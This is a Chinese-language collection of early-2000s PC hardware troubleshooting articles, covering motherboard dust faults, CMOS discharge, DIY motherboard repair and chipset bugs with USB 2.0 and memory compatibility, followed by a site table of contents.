    根据朋友述说的故障现象，笔者初步判断为病毒所致或者硬盘本身出现了问题。按照先软后硬、先简单后复杂的检修原则，拿出最新的KV3000杀毒软件准备对硬盘进行查杀，可是用启动盘进入DOS模式后，却提示找不到各驱动器，看来杀毒是无法进行了。

    重启电脑并进入主板BIOS，发现硬盘参数无不当之处，但自动检测却无法识别硬盘。看来只有检查硬件了，打开机箱，将硬盘电源线与数据线拔下重新插好，开机还是无法识别硬盘。难道是硬盘出了问题？将硬盘拆下接到笔者的爱机上，能够正常工作，也就是说硬盘没有问题。难道是数据线坏了？用笔者的数据线把硬盘重新接到故障机，故障依旧。会不会是电源的问题，换上笔者的长城电源，还是无法唤醒硬盘。仔细观察主板，硬盘接在IDE1接口，光驱接在IDE2接口上，光驱能使用为什么硬盘就有问题。试着将光驱拆下，将硬盘接到IDE2接口上，硬盘竟然能正常使用了。邪门，何以IDE2完好而IDE1出故障，它们可是由同一主控芯片控制的啊！

    无奈之下，只好拆下主板进行观察，这时发现其背面有好几处布满了灰尘，其中有一处正好位于IDE1接口的焊点处，堆积的灰尘几乎将焊点覆盖了。将灰尘清理干净，固定好主板，装好各配件，重新启动计算机，顺利地进入了系统，一切恢复正常。

    灰尘是电脑的隐形杀手，堆积的灰尘妨碍了散热，易于损坏元器件，在潮湿天气还会造成电路短路现象。灰尘对计算机的机械部分也有极大的影响。因此，定期给爱机做卫生显得格外重要。


主板自保护引发故障一例

《一键清理系统垃圾》

主板自保护引发故障一例

    一日开机，主机的指示灯不亮，并且听不到主机内电源风扇的旋转声和硬盘的自检声。重启、再重启……故障依旧。

    首先检查外部交流电是否有问题，因为电压过高或过低可能引起电源过载保护，用测电笔和万用表先检测电源插座及电源线的电压，结果一切正常。于是将爱机开膛剖肚，检查电源开关及复位键内部金属接触片的接触情况和连线是否有电源短路现象。之后采用排除法，仅剩主板、内存、CPU和显卡这几项系统启动必备的配件然后开机，结果发现问题依旧存在。看来只有将嫌疑最大的电源拆下，经在电脑公司工作的朋友鉴定，电源是好的。于是又将CPU装在别的计算机上检测，也没有发现故障。重新将电源装上后，检查主板上的各种电源连接线信号是否有松动，确认无误后开机还是黑屏……无奈之下只好做最后的尝试，将CMOS电池的跳线帽从1~2针脚移到2~3针脚后再移回（放电），开机故障解决！

    后来笔者发现，造成这种原因主要是由于主板具有自动侦测功能，当CPU或电源风扇转速及各配件电压或温度不正常时，主板自动采取保护措施无法启动，进行CMOS放电后电脑就能正常工作了。


自己动手修主板

《一键清理系统垃圾》

自己动手修主板

    前言：随着主板的集成度越来越高，维修主板的难度越来越高，往往需要维修人员具有丰富的专业知识并借助专门的数字检测设备才能解决问题。“主板损坏就换主板”是一般电脑使用者解决主板故障的常用方法。

    现在，一块主板价格在600至1000元之间，如果出一点小问题就弃之不用，实在太可惜。其实，有些故障不需要专门检测设备，也不需要高深的计算机专业知识就可以修复。下面，我们把在维修工作中遇到的一些主板维修实例列举如下，供DIYer们参考。

    一、CMOS参数丢失
    开机后提示“CMOS Battery State Low”，有时可以启动，使用一段时间后死机，这种现象大多是CMOS供电不足引起的。对于不同的CMOS供电方式，采取不同的措施：1.焊接式电池：用电烙铁重新焊上一颗新电池即可。2.钮扣式电池：直接更换。3.芯片式：更换此芯片最好采用相同型号芯片替换。如果更换电池后时间不长又出现同样现象的话，很可能是主板漏电，可检查主板上的二极管或电容是否损坏，也可以跳线使用外接电池。

    二、主板上键盘接口不能使用

    接上一好键盘，开机自检时出现提示“Keyboard Interface Error”后死机，拔下键盘，重新插入后又能正常启动系统，使用一段时间后键盘无反应，这种现象主要是多次拔插键盘引起主板键盘接口松动，拆下主板用电烙铁重新焊接好即可；也可能是带电拔插键盘，引起主板上一个保险电阻断了（在主板上标记为Fn的东西），换上一个1欧姆/0.5瓦的电阻即可。

   三、集成在主板上的显示适配器故障

    一般来说，计算机开机响几声，大多数是主板内存没插好或显示适配器故障。有一长城微机，开机响8声，确定是显示器适配器故障。打开机箱发现显示适配器集成在主板上，又无主板说明书。针对这种情况，要仔细查看主板上的跳线标示，屏蔽掉主板上集成的显示设备，然后在扩展槽上插上好的显示卡后故障排除（有些主板可能是通过CMOS设置来允许或禁止该功能）。
四、集成在主板上的打印机并口损坏

    品牌机及多数486以上的微机打印机并口，大多集成在主板上，用机的时候带电拔插打印机信号电缆线最容易引起主板上并口损坏。遇到类似情况，可以查看主板说明书，通过“禁止或允许主板上并口功能”相关跳线，设置“屏蔽”主板上并口功能。另一种是通过CMOS设置来屏蔽，然后在ISA扩展槽中加上一块多功能卡即可。

    五、主板上软、硬盘控制器损坏
    从486开始，大多数主板均集成软、硬盘控制器。如果软盘控制器损坏，也可以仿照上面的方法加一块多功能卡即可搞定（相应更改主板上跳线或CMOS设置）；如果硬盘控制器坏，针对不同情况处理：如果所接硬盘小于528MB，可以加多功能卡；如果不是的话，需要更新主板BIOS或利用相关的软件了。

    六、主板上Cache损坏
    主板上Cache损坏，表现为运行软件死机或根本无法装软件。可以在CMOS设置中将“External Cache”项设为“Disable”后故障排除。

    七、主板上开关电源损坏
    主板上的电源多为开关电源，所用的功率管为分离器件，如有损坏，只要更换功率管、电容等即可。


最新主流两大平台Bug大爆光及解决方案

《一键清理系统垃圾》

返回总目录 上一页 目录页

最新主流两大平台Bug大爆光及解决方案

    现在主流Intel PC平台已经发展到了865和875系列，提供了AGP 8X、双通道DDR400和S-ATA支持，与之对应的AMD平台也毫不示弱，也提供了相当的规格和性能，在这里就针对这两个平台中较主流的芯片组(845、865系列和KT400、nForce2)给大家详细介绍一下它们的Bug和相应的解决办法。

    USB 2.0的驱动安装与使用

    由于现在主流的几大平台都内建了对USB 2.0技术的支持，但是微软的Windows XP系统并没有内建对USB 2.0的支持，直到推出了SP1扩展包之后才增加了对USB 2.0的支持，所以不少朋友在使用USB 2.0设备时遇到了不少问题。

    市面上的主流芯片组都是通过南桥内建了对USB 2.0的支持(Intel的支持方式是ICH4南桥，VIA是VT8235南桥，而nForce2则是MCP系列南桥)，所以它们在安装驱动和使用外围设备的时候遇到的问题都几乎差不多。

    1.在Windows XP下驱动安装的问题

    问题现象：最近组装了一台新电脑，主板是845E芯片组的。电脑安装了双系统，为Windows 98和Windos XP，在Windows 98下把驱动都安装完全后，什么问题都没有，设备管理器里也没有任何未知设备和感叹号，但是在Windows XP我手动安装驱动也不行，总是出现黄色的感叹号。我试着更新SP1扩展包，但是系统提示我的语言不对，不能升级，现在在Windows XP我的USB设备都不能使用。

    问题分析和解决办法：的确，不少USB 2.0设备在Windows 98和Windows 2000下都能工作得很好，但是在Windows XP却不能正常工作。出现这样的问题主要还是您的USB设备的Windows XP系列驱动需要SP1的支持，所以如果不升级到SP1的话，驱动是不能正常安装的。由于您已经自行升级过，系统提示您的语言包不对，这很可能您安装了多国语言扩展包的缘故。您可以重新安装正版的Windows XP然后升级到SP1再激活，这样您的USB 2.0设备就会自动被系统识别，并且可以正常使用了。提示：这种驱动的安装方法仅限于Windows XP操作系统和支持USB 2.0的全系列芯片组。

    2.USB 2.0外接硬盘在nForce2平台下的问题

    问题现象：我最近购买了一块EPoX 8RDA+主板(支持USB 2.0规格)，一个USB 2.0的移动硬盘。如果我使用USB 1.1的传输模式拷贝软件的话，不管文件多大，都没有问题。但是当我使用USB 2.0模式拷贝文件时，如果拷贝较大的文件，例如：500M左右的大文件。当拷贝了4%的时候，系统就会报错(不管是Windows 98、Windows 2000还是Windows XP系统)，然后移动硬盘盒上的指示灯就会变成红色(正常模式是绿色)，系统就会找不到硬盘了。然后我把硬盘拔下重新再插一次就可以找到硬盘了，但是再次拷贝文件依旧还是同样的问题。我的硬盘盒是USB+PS2口供电的，而我的硬盘盒在Intel 845E系列主板上就可以正常使用。

    问题分析和解决办法：初步判断这是nForce2芯片组的一个Bug，如果您想要得到完善的解决需要等待下一个版本的芯片组出现才行。不过还可以在这里教您几招。

    由于您的移动硬盘盒是USB+PS/2口供电的，而主板的USB接口最多只能提供500mA的电流，即使加上PS/2口(同时不排除nForce2芯片组设计上的Bug，即对USB接口供电设计没有达到标准)，也肯定不能够满足硬盘的需要，所以使用这种硬盘盒来做移动硬盘是绝对不能够正常使用的。所以您会遇到拷贝大文件出现供电不足，而导致系统报错，出现找不到硬盘的现象。对于这种现象您完全可以更换一个硬盘盒试试，尽量使用带有外接电源的硬盘盒。

    内存不兼容问题

    按照常理来说，高质高价的盒装内存产品的兼容性要比一般的内存强得多的，但实际上由于不少芯片组的设计和主板的设计上的Bug，也导致了不少问题。在这里提醒大家，如果您发现自己的电脑运行不稳定，不妨考虑一下是否是内存和主板不兼容而造成的。

    1.Kingmax部分批号内存与Intel 845E系列芯片组主板产生不兼容的问题

    问题现象：前不久新装了一台兼容机，我选择了超频性能都很出色的升技BH6主板，又买了一条DDR333内存，但是回家后发现此种内存在标准状态下工作并不是太稳定。

    问题分析和解决办法：这种兼容性问题不是很好下结论，不过从价格的角度来看，还是更换内存较为方便。

    2.多种颗粒内存与nForce2 IGP芯片组不兼容问题

    问题现象：前两天去升级，由于资金不够，我选择了nForce2 IGP芯片组的承启7NIF2主板。在安装系统的时候，开始用HY的DDR266 256M条子换了两次，总是出现一玩3D游戏就蓝屏的兼容性的问题(玩2D还好)。本来以为是内存的质量问题，后来由于时间问题，直接加钱换了两根Kingston颗粒的Kingston DDR333 256M盒装内存回家。回家后开机一试，发现3D游戏可以正常运行了，也不蓝屏了。但是2D游戏却出现分屏的现象，难道nForce2 IGP的兼容性就那么差？

    问题分析和解决办法：据了解，IGP北桥的nForce2主板确实与盒装Kingston的KVR333X64C25/256编号内存存在比较严重的兼容性问题，尤其不兼容Kingston颗粒，这也是nForce2主板的设计问题。出现不兼容的现象就是在玩游戏时花屏或者死机，同时还伴有一些奇怪的问题。如果您购买的刚好是此种颗粒的内存产品，而且无法更换主板，解决办法只有与经销商协商更换成另外一种颗粒的产品试试。提示：在购买内存之前，您可以先到这个网页查看一下通过nVIDIA认证的内存产品，地址为http//www.nvidia.com/content/nForce MemoryCompatability/lstnForceMemory Compatibility.asp＃nForce%20Compatible %20Modules。如果您没有上网的条件，建议您把内存更换为Infenon(西门子)颗粒的DDR 333内存试试，nForce2主板与这种内存至今还没发现兼容性问题。

    3.VIA KT400内存兼容性问题

    KT400芯片组推出已经有一段时间了，KT400芯片组顾名思义，应该是支持DDR400内存，但是从威盛官方说明和产品技术参数上都找不到支持DDR400内存的说法，其实KT400芯片组只支持到DDR333内存。

    问题现象：一位朋友最近购买了一块物美价廉的EPoX 8K9AI主板，但是当他在这片主板上同时插上两条以上的DDR400内存，系统将会不能开机，或者在运行时出现各种奇怪的问题，而只要拔下一根，只插上一根DDR400的内存条时就不会出现任何的问题。

    问题分析和解决：据了解，威盛KT400芯片组的确可以支持DDR400内存，但是实际上只支持2 banks的DDR400内存，也就是说目前KT400主机板不能插超过2条的DDR400内存。同时也了解到威盛目前的KT400芯片组甚至只能在安插1条DDR400内存的时候正常运行！所以这个问题可以说是威盛VT8368北桥芯片当中的Bug所导致的。到目前为止，VIA并没有推出后续的新版芯片组来改善这个问题，看来大家想要得到改善，只有等待VIA KT600芯片组。还好，VIA KT600芯片组已经开始出现工程样板了，距离上市并不是太远了。

    Intel最新865PE主板Bug

    现在市面上Intel平台的最新产品要算865系列主板了，此款芯片组上市时间不长，并且市面上的能够买得到的型号并不是太多，在这里只有拿抢先上市的微星MSI 865PE neo2来给大家简单介绍一下。

    问题现象：一位朋友购买了微星公司出品的最新款MSI 865PE neo2主板，使用后发现有许多问题：当进行超频尝试之后，一旦超频失败后，在某些情况下，即使给CMOS放电也不能立即启动；CPU的监控报告温度偏高；主板自带的Corecenter对工作频率的计算有问题，在系统大负荷下，显示核心频率在2.9G~3.2G波动，峰值甚至达到过4G！并且如果安装Windows 98操作系统之后，无法启动APIC SCI IRQ device；BIOS中的内出CAS延迟设置只有2和2.5两档可供选择。

    问题分析和解决方法：由于此款主板是一款最新推出的产品，虽然MSI研发实力雄厚，但对于芯片组的Bug也是无能为力的。我们唯一能够做的就是按兵不动，静静等到所有厂家都推出此款芯片组的主板之后，确定设计已经成熟，我们再购入。

    据海外媒体的消息，Intel 865PE主板当前版本的驱动程序还存在几个Bug，所以在当使用测试软件时，在DVD解码测试就会出现问题。比如说，865PE主板就不一定能通过3DMark2001和3DMark03的测试，即使测试通过，得分都会比较低。其实不仅是测试软件，当图形和视频运用时同样也会出现故障。而当前Intel还未对865芯片组系列作出驱动升级。


主板故障

《一键清理系统垃圾》

返回总目录

主板故障

◎主板维修精华
◎ATX结构主板通电即开机故障的解决
◎PC机主板常见故障分析和排除
◎VIA芯片主板使用经验两则
◎电脑端口基础知识(必读篇)
◎读懂主板BIOS的语言
◎关于维修主板的几点参考
◎换芯法”医主板
◎计算机硬件维护知识
◎教你如何清洗主板
◎老主板“软斗”大硬盘
◎老主板安装希捷大硬盘
◎破解主板RAID功能
◎赛扬II和主板搭配FAQ
◎声卡与主板硬冲突
◎铜矿”主板的选择和升级
◎一、主板
◎无法启动？主板故障浅析
◎硬件基础知识
◎在集成型主板上安装新声卡
◎攒机故障自助手册之主板跳线篇
◎主板变形导致显卡故障
◎主板不加电，真的是主板坏了吗
◎主板代码的识别
◎主板电池没电引起罕见故障
◎主板电路故障修复一例
◎主板电源导致电脑重启动一例
◎主板短路也可维修
◎主板I/O供电不足引发的Modem掉线
◎主板故障的分析和诊断
◎主板故障的分析及维修
◎主板故障全面诊断
◎主板维修常识
◎主板维修资料
◎主板无法识别硬盘灰尘是凶手
◎主板自保护引发故障一例
◎自己动手修主板
◎最新主流两大平台Bug大爆光及解决方案

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录